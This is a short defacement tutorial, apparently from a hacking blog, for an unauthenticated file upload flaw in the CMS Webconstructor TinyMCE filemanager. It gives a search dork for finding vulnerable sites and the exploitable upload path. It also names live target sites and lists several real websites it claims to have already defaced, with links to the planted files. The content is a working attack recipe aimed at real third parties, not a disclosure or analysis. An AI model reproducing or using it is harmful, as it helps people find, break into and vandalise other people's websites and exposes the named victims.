CMS Webconstructor Remote File Upload [Deface]

CMS Webconstructor Remote File Upload

Tutorial deface “CMS Webconstructor Remote File Upload Vulnerability”


===============================================
Exploit Title: CMS Webconstructor Remote File Upload Vulnerability
Dork: intext:CMS: webconstructor.pl
Category: Remote, Webapps
Tested on: Windows Xp SP3

===============================================

-> Exploit <-
http://[localhost]/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php

-> Allowed File <-
You can upload ,html ,pdf ,ppt ,txt ,doc ,jpg, etc except php, php4, asp

-> Preview <-
- You can see if you success upload file.

-> Live Target <-
- http://mexico-extreme.com/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
– http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php

===============================================
Contoh website yang dah berjaya deface :)

http://www.battlefieldhistory.tv
Hasil:
http://www.battlefieldhistory.tv/my_documents/my_files/D4rk.htm

http://www.sezimyapi.com
Hasil:
http://www.sezimyapi.com/admin/my_documents/my_files/9DB_D4rk.htm

http://www.ullerslev-gaf.dk
Hasil:
http://www.ullerslev-gaf.dk/admin/my_documents/my_files/E97_dark.jpg

http://www.prettyshady.com
Hasil:
http://www.prettyshady.com/2010/up/dark.jpg

Hehe :)